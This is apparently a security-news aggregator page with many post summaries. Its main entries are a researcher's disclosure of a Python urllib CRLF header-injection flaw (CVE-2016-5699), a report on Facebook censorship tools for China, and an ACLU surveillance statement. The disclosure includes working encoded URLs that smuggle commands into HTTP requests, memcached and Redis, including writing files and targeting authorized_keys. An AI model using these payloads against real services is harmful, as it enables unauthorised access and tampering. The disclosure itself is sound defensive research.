    • A purely single-page web app that doesn’t store state in the URL at all will have to do this a bit differently, possibly by recording the AJAX requests done as each user crawls, then forcing those rather than front-end state.
    • The test as described doesn’t catch similar vulnerabilities involving other kinds of user-controllable input, such as cookies and hidden form submissions. It might be worth expanding to record everything (besides the authentication secret) the privileged user sends, and replaying it as the unprivileged user.
    • It may be non-trivial to ensure your privileged user always has all possible privileges.

    And one final, meta-level disclaimer: try not to write projects with authorization rules that keep you up at night, scattered around different files and enforced in different ways. Try to put all of them in one place, so you can reference them both when deciding what links to render and what actions to allow. Make it impossible to process a request if no authorization check has run. And then test anyway.

    ...more

    Vulnerability in Blackphone Allows Complete Takeover | SentinelOne.com

    Published: 2019-03-08 00:00:20

    Popularity: None

    Author: By SentinelOne Labs -

    The Blackphone is generally considered the most secure smartphone available today. We recently discovered a vulnerability that could allow an attacker to remotely control the phone’s modem functions.

    ...more

    Raising the Dead

    Published: 2019-03-08 00:00:12

    Popularity: None

    Author: Posted by

    Posted by James Forshaw, your Friendly Neighbourhood Necromancer. It’s a bit late for Halloween but the ability to resurrect the dead (p...

    ...more

    [manager.paypal.com] Remote Code Execution Vulnerability

    Published: 2019-03-07 23:59:10

    Popularity: None

    Author: Posted by

    In December 2015, I found a critical vulnerability in one of PayPal business websites ( manager.paypal.com ). It allowed me to exe...

    ...more

    The Rising Sophistication of Network Scanning

    Published: 2019-03-07 23:58:59

    Popularity: None

    Author: Posted by

    Gone are the days when computers didn't need firewalls. We are now living in an internet security arms race and your personal information ...

    ...more

    Putting the spotlight on firmware malware

    Published: 2019-03-07 23:58:48

    Popularity: None

    Author: Published by

    Firmware malware has been a hot topic ever since Snowden's leaks revealed NSA's efforts to infect BIOS firmware. However, BIOS malware is no...

    ...more

    BinDiff now available for free

    Published: 2019-03-07 23:56:35

    Popularity: None

    Author: Posted by Christian Blichmann, Software Engineer

    Posted by Christian Blichmann, Software Engineer BinDiff is a comparison tool for binary files that helps to quickly find differences and ...

    ...more

    Why we should fear a cashless world | Dominic Frisby

    Published: 2019-03-07 23:56:12

    Popularity: None

    Author: Dominic Frisby

    Poor people and small businesses rely on cash. A contactless system will likely entrench poverty and pave the way for terrifying levels of surveillance

    ...more

    Android Security 2015 Annual Report

    Published: 2019-03-07 23:55:29

    Popularity: None

    Author: Posted by Adrian Ludwig, Lead Engineer, Android Security

    Posted by Adrian Ludwig, Lead Engineer, Android Security Today, for the second year in a row , we’re releasing our Android Security Annual ...

    ...more

    Gatecoin | Bitcoin & Ethereum Token Exchange

    Published: 2019-03-07 23:53:34

    Popularity: None

    Author: by Bonnie Chan

    Gatecoin is a bitcoin and ethereum token exchange based in Hong Kong. Trade BTC and ETH worldwide with USD, EUR and HKD.

    ...more

    Blindspot Security

    Published: 2019-03-07 23:49:06

    Popularity: None

    Author: Posted by

    Update 1: The MITRE Corporation has assigned CVE-2016-5699 to this issue. Update 2: Remarkably, Blogger stripped the %00 element from a non-clickable URL when I originally posted this.  So I had to "fix" that by obfuscating it. *sigh*

    Overview

    Python's built-in URL library ("urllib2" in 2.x and "urllib" in 3.x) is vulnerable to protocol stream injection attacks (a.k.a. "smuggling" attacks) via the http scheme. If an attacker could convince a Python application using this library to fetch an arbitrary URL, or fetch a resource from a malicious web server, then these injections could allow for a great deal of access to certain internal services.

    The Bug


    The HTTP scheme handler accepts percent-encoded values as part of the host component, decodes these, and includes them in the HTTP stream without validation or further encoding. This allows newline injections. Consider the following Python 3 script (named fetch3.py):

    #!/usr/bin/env python3
    import sys
    import urllib
    import urllib.error
    import urllib.request

    # The URL to fetch is taken verbatim from the command line.
    url = sys.argv[1]

    try:
        # Fetch the URL and print the response headers.
        info = urllib.request.urlopen(url).info()
        print(info)
    except urllib.error.URLError as e:
        print(e)

    This script simply accepts a URL in a command line argument and attempts to fetch it. To view the HTTP headers generated by urllib, a simple netcat listener was used:

    nc -l -p 12345 

    In a non-malicious example, we can hit that service by running:

    ./fetch3.py http://127.0.0.1:12345/foo 

    This caused the following request headers to appear in the netcat terminal:

    GET /foo HTTP/1.1
    Accept-Encoding: identity
    User-Agent: Python-urllib/3.4
    Connection: close
    Host: 127.0.0.1:12345

    Now we repeat this exercise with a malicious hostname:

    ./fetch3.py http://127.0.0.1%0d%0aX-injected:%20header%0d%0ax-leftover:%20:12345/foo 

    The observed HTTP request is:

    GET /foo HTTP/1.1
    Accept-Encoding: identity
    User-Agent: Python-urllib/3.4
    Host: 127.0.0.1
    X-injected: header
    x-leftover: :12345
    Connection: close

    Here the attacker can fully control a new injected HTTP header.

    The attack also works with DNS host names, though a NUL byte must be inserted to satisfy the DNS resolver. For instance, this URL will fail to look up the appropriate hostname:

    http://localhost%0d%0ax-bar:%20:12345/foo 

    But this URL will connect to 127.0.0.1 as expected and allow for the same kind of injection:

    http://localhost%00%0d%0ax-bar:%20:12345/foo 

    Note that this issue is also exploitable during HTTP redirects. If an attacker provides a URL to a malicious HTTP server, that server can redirect urllib to a secondary URL which injects into the protocol stream, making up-front validation of URLs difficult at best.
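
    One way for an application on an unpatched interpreter to guard against this, shown as an added example that is not from the original post or from Python's fix: reject any URL whose host part percent-decodes to control bytes, and apply the same check to every redirect target. UnsafeURL, check_url, is_safe, CheckedRedirectHandler and fetch_headers are hypothetical names; the sample URLs are the ones quoted above.

```python
import urllib.request
from urllib.parse import unquote_to_bytes, urlsplit


class UnsafeURL(ValueError):
    """The URL's authority component could inject into the HTTP stream."""


def check_url(url):
    """Return `url` unchanged if its host part is harmless, else raise UnsafeURL."""
    # Raw whitespace or control characters never belong in a URL.
    if any(ch <= " " or ch == "\x7f" for ch in url):
        raise UnsafeURL("raw control character or space in URL")
    netloc = urlsplit(url).netloc
    if not netloc:
        raise UnsafeURL("URL has no host")
    # The vulnerable handler percent-decodes the host before writing it into
    # the request, so decode it the same way and look at the resulting bytes.
    decoded = unquote_to_bytes(netloc)
    bad = sorted({b for b in decoded if b <= 0x20 or b == 0x7F})
    if bad:
        raise UnsafeURL(
            "host decodes to forbidden bytes: "
            + ", ".join(f"0x{b:02x}" for b in bad)
        )
    return url


def is_safe(url):
    """Boolean wrapper around check_url for filtering and tests."""
    try:
        check_url(url)
    except ValueError:
        return False
    return True


class CheckedRedirectHandler(urllib.request.HTTPRedirectHandler):
    """Re-validate every redirect target, since a server controls Location."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        check_url(newurl)  # raises UnsafeURL and aborts the fetch
        return super().redirect_request(req, fp, code, msg, headers, newurl)


def fetch_headers(url, timeout=10):
    """Fetch `url` with both the up-front and the per-redirect check applied."""
    opener = urllib.request.build_opener(CheckedRedirectHandler)
    with opener.open(check_url(url), timeout=timeout) as resp:
        return resp.info()


# URLs quoted in the article: one benign, two with an injected host.
SAMPLE_URLS = [
    "http://127.0.0.1:12345/foo",
    "http://127.0.0.1%0d%0aX-injected:%20header%0d%0ax-leftover:%20:12345/foo",
    "http://localhost%00%0d%0ax-bar:%20:12345/foo",
]

if __name__ == "__main__":
    for sample in SAMPLE_URLS:
        print("accept" if is_safe(sample) else "reject", sample)
```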


    Attack Scenarios


    Here we discuss just a few of the scenarios where exploitation of this flaw could be quite serious. This is far from a complete list. While each attack scenario requires a specific set of circumstances, there are a vast variety of different ways in which the flaw could be used, and we don't pretend to be able to predict them all.

    HTTP Header Injection and Request Smuggling


    The attack scenarios related to injecting extra headers and requests into an HTTP stream have been well documented for some time. Unlike the early request smuggling research, which has a complex variety of attacks, this simple injection would allow the addition of extra HTTP headers and request methods. While the addition of extra HTTP headers seems pretty limited in utility in this context, the ability to submit different HTTP methods and bodies is quite useful. For instance, if an ordinary HTTP request sent by urllib looks like this:

    GET /foo HTTP/1.1
    Accept-Encoding: identity
    User-Agent: Python-urllib/3.4
    Host: 127.0.0.1
    Connection: close

    Then an attacker could inject a whole extra HTTP request into the stream with URLs like:

    http://127.0.0.1%0d%0aConnection%3a%20Keep-Alive%0d%0a%0d%0aPOST%20%2fbar%20HTTP%2f1.1%0d%0aHost%3a%20127.0.0.1%0d%0aContent-Length%3a%2031%0d%0a%0d%0a%7b%22new%22%3a%22json%22%2c%22content%22%3a%22here%22%7d%0d%0a:12345/foo

    Which produces:

    GET /foo HTTP/1.1
    Accept-Encoding: identity
    User-Agent: Python-urllib/3.4
    Host: 127.0.0.1
    Connection: Keep-Alive

    POST /bar HTTP/1.1
    Host: 127.0.0.1
    Content-Length: 31

    {"new":"json","content":"here"}
    :12345
    Connection: close


    Attacking memcached


    As described in the protocol documentation, memcached exposes a very simple network protocol for storing and retrieving cached values. Typically this service is deployed on application servers to speed up certain operations or share data between multiple instances without having to rely on slower database calls. Note that memcached is often not password protected because that is the default configuration. Developers and administrators often operate under the poorly conceived notion that "internal" services of these kinds can't be attacked by outsiders.

    In our case, if we could fool an internal Python application into fetching a URL for us, then we could easily access memcached instances. Consider the URL:

    http://127.0.0.1%0d%0aset%20foo%200%200%205%0d%0aABCDE%0d%0a:11211/foo 

    This generates the following HTTP request:

    GET /foo HTTP/1.1
    Accept-Encoding: identity
    Connection: close
    User-Agent: Python-urllib/3.4
    Host: 127.0.0.1
    set foo 0 0 5
    ABCDE
    :11211

    When evaluating the above lines in light of memcached protocol syntax, most of the above produce syntax errors. However, memcached does not close the connection upon receiving bad commands. This allows attackers to inject commands anywhere in the request and have them honored. The above request produced the following response from memcached (which was configured with default settings from the Debian Linux package):

    ERROR
    ERROR
    ERROR
    ERROR
    ERROR
    STORED
    ERROR
    ERROR

    The "foo" value was later confirmed to be stored successfully. In this scenario an attacker would be able to send arbitrary commands to internal memcached instances. If an application depended upon memcached to store any kind of security-critical data structures (such as user session data, HTML content, or other sensitive data), then this could perhaps be leveraged to escalate privileges within the application. It is worth noting that an attacker could also trivially cause a denial of service condition in memcached by storing large amounts of data.

    Attacking Redis

    Redis is very similar to memcached in several ways, though it also provides backup storage of data, several built-in data types, and the ability to execute Lua scripts. Quite a bit has been published about attacking Redis in the last few years. Since Redis provides a TCP protocol very similar to memcached, and it also allows one to submit many erroneous commands before correct ones, the same attacks work in terms of fiddling with an application's stored data.

    In addition, it is possible to store files at arbitrary locations on the filesystem which contain a limited amount of attacker controlled data. For instance, this URL creates a new database file at /tmp/evil:

    http://127.0.0.1%0d%0aCONFIG%20SET%20dir%20%2ftmp%0d%0aCONFIG%20SET%20dbfilename%20evil%0d%0aSET%20foo%20bar%0d%0aSAVE%0d%0a:6379/foo 

    And we can see the contents include a key/value pair set during the attack:

    # strings -n 3 /tmp/evil
    REDIS0006
    foo
    bar

    In theory, one could use this attack to gain remote code execution on Redis by (over-)writing various files owned by the service user, such as: 

    ~redis/.profile
    ~redis/.ssh/authorized_keys
    ...

    However, in practice many of these files may not be available, not used by the system or otherwise not practical in attacks.

    Versions Affected


    All recent versions of Python in the 2.x and 3.x branches were affected. Cedric Buissart helpfully provided information on where the issue was fixed in each:



    While the fix has been available for a while in the latest versions, the lack of follow-through by Python Security means many stable OS distributions likely have not had back patches applied to address it. At least Debian Stable, as of this writing, is still vulnerable.


    Responsible Disclosure Log


    2016-01-15

    Notified Python Security of vulnerability with full details.

    2016-01-24

    Requested status from Python Security, due to lack of human response.


    2016-01-26

    Python Security list moderator said original notice held up in moderation queue. Mails now flowing.


    2016-02-07

    Requested status from Python Security, since no response to vulnerability had been received.


    2016-02-08

    Response from Python Security. Stated that issue is related to a general header injection bug, which has been fixed in recent versions. Belief that part of the problem lies in glibc; working with RedHat security on that.


    2016-02-08

    Asked if Python Security had requested a CVE.


    2016-02-12

    Python Security stated no CVE had been requested, will request one when other issues sorted out. Provided more information on glibc interactions.


    2016-02-12

    Responded in agreement that one aspect of the issue could be glibc's problem.


    2016-03-15

    Requested a status update from Python Security.


    2016-03-25

    Requested a status update from Python Security. Warned that typical disclosure policy has a 90 day limit.


    2016-06-14

    RedHat requested a CVE for the general header injection issue. Notified Python Security that full details of issue would be published due to inaction on their part.


    2016-06-15

    Full disclosure.



    Final Thoughts


    I find it irresponsible of the developers and distributors of Redis and memcached to provide default configurations that lack any authentication. Yes, I understand the reasoning that they should only be used on "trusted internal networks". The problem is that very few internal networks, in practice, are much safer than the internet. We can't continue to make the same bad assumptions of a decade ago and expect security to improve. Even an unauthenticated service listening on localhost is risky these days. It wouldn't be hard to add an auto-generated, random password to these services during installation. That is, if the developers of these services took security seriously.

    ...more

    A year of Windows kernel font fuzzing #1: the results

    Published: 2019-03-07 23:48:39

    Popularity: None

    Author: Posted by

    Posted by Mateusz Jurczyk of Google Project Zero This post series is about how we used at-scale fuzzing to discover and report a tot...

    ...more

    How to Compromise the Enterprise Endpoint

    Published: 2019-03-07 23:48:02

    Popularity: None

    Author: Posted by

    Posted by Tavis Ormandy. Symantec is a popular vendor in the enterprise security market, their flagship product is   Symantec Endpoint ...

    ...more

    Extracting Qualcomm's KeyMaster Keys - Breaking Android Full Disk Encryption

    Published: 2019-03-07 23:47:30

    Popularity: None

    Author: Posted by

    A security blog focusing on Android, the Linux Kernel and everything nice.

    ...more

    Solar Shed Summary: My Off Grid Office

    Published: 2019-03-07 23:43:27

    Popularity: None

    Author: Posted by

    A few months ago I moved to a few acres in the country, and needed somewhere to work - so I built myself a solar powered off grid office out...

    ...more

    EquationGroup Tool Leak – ExtraBacon Demo

    Published: 2019-03-07 23:40:36

    Popularity: None

    Author: Published by

    Hi there, You may have heard that recently (15/08/2016) a group known as Shadow Brokers released what are said to be a bunch of exploits and tools written and used by the NSA. Two tar were released…

    ...more

    Return to libstagefright: exploiting libutils on Android

    Published: 2019-03-07 23:37:16

    Popularity: None

    Author: Posted by

    Posted by Mark Brand, Invalidator of Unic�o�d�e I’ve been investigating different fuzzing approaches on some Android devices recently, ...

    ...more

    "Why do you work in security instead of something more lasting ?"

    Published: 2019-03-07 23:33:56

    Popularity: None

    Author: Posted by

    This post grew out of a friend on Facebook asking (I paraphrase) "why do you spend your time on security instead of using your brainpower f...

    ...more

    90 Cents of Every “Pay-for-Performance” Dollar are Paid for Luck

    Published: 2019-03-07 23:33:15

    Popularity: None

    Author: Posted by Moshe Levy, Hebrew University of Jerusalem, on

    Read our latest post from Moshe Levy (Jerusalem School of Business Administration) at

    ...more

    Consensus without Trust: Cryptographic Enforcement of Distributed Protocols

    Published: 2019-03-07 23:30:10

    Popularity: None

    Author: Posted by

    Intro Most services on the internet work by having a lot of servers owned by the same group of people running software that receives inp...

    ...more

    Pixel Security: Better, Faster, Stronger

    Published: 2019-03-07 23:29:37

    Popularity: None

    Author: Posted by Paul Crowley, Senior Software Engineer and Paul Lawrence, Senior Software Engineer

    Posted by Paul Crowley, Senior Software Engineer and Paul Lawrence, Senior Software Engineer [Cross-posted from the Android Developers Blog...

    ...more

    The Purple Team Pentest

    Published: 2019-03-07 23:27:38

    Popularity: None

    Author: Posted by

    It’s not particularly clear whether a marketing intern thought he was being clever or a fatigued pentester thought she was being cynical whe...

    ...more

    Facebook Accused of Building Censorship Tools for China – China Digital Times (CDT)

    Published: 2019-03-07 23:27:29

    Popularity: None

    Author: Posted By:

    founder has raised eyebrows with a string of apparent attempts to woo Chinese authorities, from giving speeches in Chinese and jogging through Beijing smog, to leaving a Xi Jinping book on his desk while hosting former cyberczar Lu Wei, and even asking Xi to name his daughter. In March, a leaked propaganda directive calling for steps against “malicious commentary” on these efforts prompted speculation that Beijing might prove more receptive than many had supposed. So did internet regulator Ren Xianliang’s recent reiteration of the longstanding official position that “as long as they respect China’s laws, don’t harm the interests of the country, and don’t harm the interests of consumers, we welcome [Facebook and Google] to enter China.” On Tuesday, The New York Times’ Mike Isaac reported that the company has taken concrete steps towards satisfying these requirements, with the development of experimental tools that might be wielded by a Chinese partner company.

    [… T]he project illustrates the extent to which Facebook may be willing to compromise one of its core mission statements, “to make the world more open and connected,” to gain access to a market of 1.4 billion Chinese people. Even as Facebook faces pressure to continue growing — Mr. Zuckerberg has often asked where the company’s next billion users will come from — China has been cordoned off to the social network since 2009 because of the government’s strict rules around censorship of user content.

    The suppression software has been contentious within Facebook, which is separately grappling with what should or should not be shown to its users after the American presidential election’s unexpected outcome spurred questions over fake news on the social network. Several employees who were working on the project have left Facebook after expressing misgivings about it, according to the current and former employees.

    [… S]ome officials responsible for China’s tech policy have been willing to entertain the idea of Facebook’s operating in the country. It would legitimize China’s strict style of internet governance, and if done according to official standards, would enable easy tracking of political opinions deemed problematic. Even so, resistance remains at the top levels of Chinese leadership. [Source]

    Bloomberg’s Sarah Frier similarly stressed that there seems to be no immediate prospect of Facebook’s entry into China:

    Chief Executive Officer Mark Zuckerberg visits China frequently, and yet the company is no closer to putting employees in a downtown Beijing office it leased in 2014, according to a person familiar with the matter. The company hasn’t been able to get a license to put workers there, even though they would be selling ads shown outside the country, not running a domestic social network, the person said. The ad sales work is currently done in Hong Kong. The person asked not to be identified discussing private matters.

    […] China and Facebook aren’t engaged in ongoing talks about the conditions of a return, according to a separate person familiar with the matter who asked not to be identified as the matter is private. The ability to censor content would be a precondition, not the deciding factor, in any entry to the Chinese market, the person said. [Source]

    The current climate in China is hardly welcoming for foreign firms, particularly following the recent passage of a draconian new cybersecurity law which mandates self-censorship, unspecified “technical support” to authorities, security reviews, and local storage of user data. Cartoonist summed this situation up last week with a skeptical take on the third “World Internet Conference” held in Wuzhen:

    The banner reads “World Disinternet Conference,” with bulian (不联), meaning “disconnected,” replacing hulian (互联), or “interconnected,” in the Chinese term for “internet,” hulianwang (互联网). Read more from CDT on the three World Internet Conferences China has hosted, including a round-up on this year’s with translation from a Xinhua commentary proclaiming Xi Jinping an “internet sage.”

    CDT Chinese has compiled a few reactions to the New York Times report from Sina Weibo. Some users mocked Facebook’s supplications to the “Imperial Court”:

    Jianchang’anbujianchang’an (@见长安不见长安): Cutting off your balls before entering the Imperial Palace?

    Luyoudahongren (@旅游大红人): Hmm, developing a castrated magical weapon to present to the emperor, this palace eunuch’s wishes are very sincere

    Guliquan (@贾利权): Facebook castrates itself, seeking entry to the Imperial Palace. [Chinese]

    Others questioned the need for a limited Facebook in China, and its chances of ever getting there:

    Guandengwuyanzu (@关灯吴彦祖): What would this actually achieve? So, we can access the same site as people abroad, but can only partially see what they post?

    Xialuotewuhuishangdeguowang (@夏洛特舞会上的国王): So this is Facebook’s corporate value system? If so, besides feeling that there’s still no way they can enter the Chinese market, I’d also like to send them a “Grass Mud Horse” [“Fuck Your Mother”]!

    000000000oo (000000000哦哦): Making a Chinese version with restricted content, it’s still just a Local Area Network [not the real Internet]

    Gongchandafahao (@共產大灋好): So what do we need you here for?

    [The screenshot shows a “comments forbidden” notice on an article headlined “Xi Jinping: ‘We should welcome well-intentioned online comments’”]

    Hulianwangdedashir (@互联网的大事儿): Better not to come at all …

    Amiaoyu (@阿喵鱼): I want YouTube! I want Twitter! I don’t want to have to pay for a VPN every month ……

    Zhengzaianfengdehuozhe (@正在安分的活着): We don’t need you, we need Twitter, we need YouTube, we need Google, we need Line, we need Instagram

    Fengchezhuanbuting (@枫车转不停): I think there’s a way for Line to come in, but there’s already no room for Facebook

    Liulianweihuabinggan (@榴莲威化饼干): There are a few apps that I hope never make it to the mainland … In the end, those who can all jump the Great Firewall. If it wasn’t there to block the others, they’d surge over and report everything back to the authorities

    Fangtianyougou (@方田有沟): If Facebook hands the authority to examine and verify content to a Chinese partner firm, “China will be the biggest winner” [mocking a common formula for headlines in official media]. [Chinese]

    Some users suggested rebranding, with one alluding to Xi Jinping’s call in February for state media to “take ‘Party’ as their surname”:

    CD_Yim (@CD_Yim): If this is true, they should change the name to “book.” They’ve lost face.

    Lihailewodege_ (@厉害了我的歌_): They should call it Partybook →_→

    Liming_shouwang_zhe (@黎明守望者): Motherfucker, Facebook also has to take Party as its surname? [Chinese]

    CDT cartoonist proposed a new logo:

    Another cartoon in a similar spirit has been deleted from Sina Weibo, according to the FreeWeibo monitoring site:

    AdachushengzaiMeiguo (@Ada出生在美国): Facebook surnamed ‘Party,’ deletes posts at will, arbitrarily prohibits, perfectly loyal, please reconsider. [Chinese]

    On Twitter, meanwhile, dozens of users scornfully contrasted Facebook’s apparent readiness to bow to Beijing with its reluctance to address the spread of fake news among users in America and elsewhere. By the U.S. election day earlier this month, fake news was substantially outperforming articles from mainstream news outlets on the platform. Founder and CEO Mark Zuckerberg initially protested that “the idea that fake news on Facebook … influenced the election … is a pretty crazy idea.” But criticism continued to mount, with The New York Times warning Zuckerberg not to let “liars and con artists hijack his platform.” He responded on Facebook that “we do not want to be arbiters of truth,” and that the company would prefer “erring on the side of letting people share what they want whenever possible,” but said that the company was cautiously working to address the issue.

    There has been no shortage of suggestions on ways to do this. According to some reports, Facebook already “absolutely [has] the tools to shut down fake news,” but has held off for fear of angering conservative users.

    The U.S. election has also prompted renewed calls for information controls in China, where official campaigns against “rumor”—loosely and often politically defined—are well established. Officials reiterated the urgency of battling rumors and online extremism at the World Internet Conference last week, as Reuters’ Catherine Cadell reports:

    Ren Xianling, the vice minister of China’s top internet authority, said on Thursday that the process was akin to “installing brakes on a car before driving on the road”.

    Ren, number two at the Cyberspace Administration of China (CAC), recommended using identification systems for netizens who post fake news and , so they could “reward and punish” them.

    The comments come as U.S. social networks Facebook Inc and Twitter Inc face a backlash over their role in the spread of false and malicious information generated by users, which some say helped sway the U.S. presidential election in favor of Republican candidate Donald Trump.

    […] Ma Huateng, the chairman and chief executive of Holdings Ltd, which oversees China’s most popular social networking app, , said Trump’s win sent an “alarm” to the global community about the dangers of fake news, a view echoed by other executives at the event. [Source]

    An editorial in the state-run Global Times mocked the hypocrisy of the “Western media’s crusade against Facebook”:

    [… M]edia platforms have the right to publish any information in the political field and cracking down on online rumors would confine freedom of speech. Isn’t this what the West advocates when it is at odds with emerging countries over Internet management? Why don’t they uphold those propositions any more?

    China’s crackdown on online rumors a few years ago was harshly condemned by the West. It was a popular saying online that rumors could force truth to come out at that time, which morally affirmed the role of rumors. This argument was also hyped by Western media. Things changed really quickly, as the anxiety over Internet management has been transferred to the US.

    […] The Internet contains enormous energy, and the political risks that go along with it are unpredictable. China is on its way to strengthening Internet management, although how to manage it is another question. China is also right in demanding that US Internet companies, including Google and Facebook, abide by Chinese laws and be subject to supervision if they want to enter China market.

    […] Problems and conflicts caused by globalization and informationization have been unleashed in the Internet era, but the Western democratic system appears to be unable to address them. [Source]

    But while some see the fake news pandemic as vindication of Chinese policy, others are unconvinced. At South China Morning Post last week, Jane Cai and Phoenix Kwong reported “Pony” Ma Huateng’s further statement at the WIC that “Tencent has always been strict in cracking down on fake news and we see it as very necessary.” But not all the Chinese executives in attendance shared his enthusiasm, they noted:

    […] Wu Wenhui, chief executive of China Reading, an online literature company, said regulators should not resort to extreme measures to tackle the problem unless it was absolutely necessary.

    “The US incidents show the internet is more and more decentralised and people do not unanimously follow the opinions of experts,” Wu said.

    “Regulators should respect the convenient platforms [of ] for the public to express their opinions. They should also be open and be honest in communicating with the public,” he said. [Source]

    Politico’s Jack Shafer, meanwhile, argued this week that “the cure for fake news is worse than the disease”:

    [… T]he fake news moral panic looks to have legs, which means that somebody is likely to get hurt before it abates. Already, otherwise intelligent and calm observers are cheering plans set forth by Facebook’s Mark Zuckerberg to censor users’ news feeds in a fashion that will eliminate fake news. Do we really want Facebook exercising this sort of top-down power to determine what is true or false? Wouldn’t we be revolted if one company owned all the newsstands and decided what was proper and improper reading fare?

    Once established to crush fake news, the Facebook mechanism could be repurposed to crush other types of information that might cause moral panic. This cure for fake news is worse than the disease.

    […] Fake news is too important to be left to the Facebook remedy—Mark Zuckerberg is no arbiter of truth. First, we need to learn to live with a certain level of background fake news without overreacting. Next, we need to instruct readers on how to spot and avoid fake news, which many publications are already doing. A few years ago, Factcheck.org showed readers how to identify bogus email claims. Snopes does yeoman work in this area, as does BuzzFeed. Software wizards should be encouraged to create filters and tools, such as browser extensions, that sniff out bogusity. [Source]

    Concerns about the concentration of information control powers in private hands have also arisen in China with, for example, a recent account suspension on Tencent’s WeChat platform over allegations that cheap roast duck came from diseased birds. From Oiwan Lam at Global Voices:

    The WeChat account of Chinese news outlet News Breakfast was recently suspended for “spreading rumors.” News Breakfast has 400,000 subscribers in WeChat and is operated by East Day, a Shanghai city government-affiliated media outlet.

    […] The incident compelled Xu Shiping, the CEO of East Day, to write two open letters to Pony Ma Huateng, the chairman of WeChat’s parent company, Tencent, questioning the monopolized status of the Internet giant and its arbitrary power over online content and censorship. Like many other Chinese news outlets, News Breakfast publishes some stories only on WeChat, rather than publishing on its website and then promoting on the social media and content service.

    […] What is Tencent? It is an Internet company. It has a capital structure and cannot represent people’s interests […] In the past two years, Mr. Ma has been a guest of local governments which have provided corporate access to data which should belong to the public. There is no evaluation of the capital value of such data access. […] Tencent’s monopoly is harmful to the state. Wait and see. Today it can exercise its unrestrained power on media outlets, tomorrow it will challenge state authority. […]

    […] If one day, all China’s media outlets are under the rule of Tencent, can we still have our “China Dream”? [Source]

    Writing at Medium, ethnographer Christina Xu noted that false pro-Trump stories have proliferated in China, despite its strict information controls. Such stories, she suggested, are more a symptom than an underlying cause:

    In an excellent series of tweets about rhetorical strategy, Bailey Poland wrote: “[Facts are] the support structure. It’s the foundation of reality on which an argument can be built, but it cannot be the whole argument.”

    In China, that foundation of reality is eroded alongside trust in institutions previously tasked with upholding the truth. Contrary to popular sentiment in the US, Chinese readers don’t blindly trust the state-run media. Rather, they distrust it so much that they don’t trust any form of media, instead putting their faith in what their friends and family tell them. No institution is trusted enough to act as a definitive fact-checker, and so it’s easy for misinformation to proliferate unchecked.

    This has been China’s story for decades. In 2016, it is starting to be the US’ story as well.

    Propaganda that is blatant and issued from the top is easy to spot and refute; here in China, it’s literally printed on red banners your eyes learn to skip past. The spread of small falsehoods and uncertainty is murkier, more organic, and much harder to undo. The distortions of reality come in layers, each more surreal than the last. Fighting it requires more than just pointing out the facts; it requires restoring faith in a shared understanding of the truth. This is the lesson Americans need to learn, and fast. [Source]


    ...more

    Security Through Transparency

    Published: 2019-03-07 23:23:54

    Popularity: None

    Author: Posted by Ryan Hurst and Gary Belvin, Security and Privacy Engineering

    Posted by Ryan Hurst and Gary Belvin, Security and Privacy Engineering Encryption is a foundational technology for the web. We’ve spent a l...

    ...more

    Moving towards a more secure web

    Published: 2019-03-07 23:23:09

    Popularity: None

    Author: Posted by Emily Schechter, Chrome Security Team

    Posted by Emily Schechter, Chrome Security Team [Updated on 12/5/16 with instructions for developers] Developers : Read more about how to ...

    ...more

    Open-Sourcing Google Earth Enterprise | Google Cloud Blog

    Published: 2019-03-07 23:22:46

    Popularity: None

    Author: 2017. You can also get more information on the GEE project site created by our partners.

    Posted by Avnish Bhatnagar, Senior Technical Solutions Engineer, Google Cloud

    ...more

    Time To Upgrade Your Python: TLS v1.2 Will Soon Be Mandatory

    Published: 2019-03-07 23:21:29

    Popularity: None

    Author: Posted by

    If you're using an older Python without the most secure TLS implementation, this is the year to get serious about upgrading. Otherwise next ...

    ...more

    Announcing the first SHA1 collision

    Published: 2019-03-07 23:19:28

    Popularity: None

    Author: Posted by Marc Stevens (CWI Amsterdam), Elie Bursztein (Google), Pierre Karpman (CWI Amsterdam), Ange Albertini (Google), Yarik Markov (Google), Alex Petit Bianco (Google), Clement Baisse (Google)

    Posted by Marc Stevens (CWI Amsterdam), Elie Bursztein (Google), Pierre Karpman (CWI Amsterdam), Ange Albertini (Google), Yarik Markov (Goog...

    ...more

    Ancient Wisdom Reveals 6 Rituals That Will Make You Happy - Barking Up The Wrong Tree

    Published: 2019-03-07 23:17:28

    Popularity: None

    Author: Written By:

    Forget self-help. Ancient wisdom has happiness tips that align with science. Bestselling author Ryan Holiday explains how Stoicism can make you smile.

    ...more

    An FBI Counterterrorism Agent Tracked Me Down Because I Took a Picture of This

    Published: 2019-03-07 23:15:25

    Popularity: None

    Author: By James Prigoff

    This is a statement from one of the plaintiffs speaking at Thursday's press conference announcing the ACLU's lawsuit challenging the government's controversial Suspicious Activity Reporting program.

    Good morning. My name is James Prigoff. I am 86 years old and a retired senior corporate executive, having been president of a Levi Strauss division and previously the senior vice president of the Sara Lee Corporation in Chicago. I am also a professional photographer – in fact, I have been a photographer for most of my life. My specialty is photographing murals, graffiti art, and other community public art. I am the co-author of three books utilizing my photographs, one of which, Spraycan Art, has sold over 200,000 copies. My photographs appear in countless other publications and my photography has been exhibited at the Smithsonian in Washington and in many other galleries. I have lectured on photography and public art in museums, universities, and venues worldwide.

    I have never had an experience like I had when attempting to photograph the "Rainbow Swash" outside Boston in 2004. Let me explain.

    The Rainbow Swash is an iconic piece of public art near Boston painted on the circumference of a 140-foot high liquefied natural gas storage tank in 1971 and repainted in 1992 at an adjacent site. It is actually one of the largest copyrighted pieces of art in the world. The original artist was Korita Kent.

    I went to Dorchester, Mass., to photograph it, but before I could take a picture, I was confronted by two security guards who came through their gate and told me I could not because the tank was on private property. I pointed out that I, being well outside the fenced area, was not on private property – but they insisted I leave. If one goes to Wikipedia there are a number of excellent close-up shots for the entire world to see.

    A few months later, I found a business card on the front door of my home in Sacramento from Agent A. Ayaz of the Joint Terrorism Task Force, asking me to call him. One of my neighbors, an elderly woman, told me that two men wearing suits had come to her door to ask her about me, her neighbor.

    When I called Agent Ayaz, he asked if I had been in Boston recently. At that moment I realized that the security guards at the Rainbow Swash site must have taken down the rental car license plate number and reported me to a law enforcement agency. I never gave the guards any information about myself, so I must have been traced across country via my rental car record.

    So, consider this: A professional photographer taking a photo of a well-known Boston landmark is now considered to be engaged in suspicious terrorist activity?

    I lived through the McCarthy era, so I know how false accusations, surveillance, and keeping files on innocent people can destroy their careers and lives. I am deeply troubled that the SAR program may be recreating that same climate of false accusation and fear today.

    Photography is an important part of my life, and I plan to keep photographing public art and public places that contain WPA murals and other architectural sites – as I have been doing for 69 years. Why have my artistic pursuits landed me in a national database potentially linking me to "terrorist" activities? There is no reason for it. This program must be stopped.
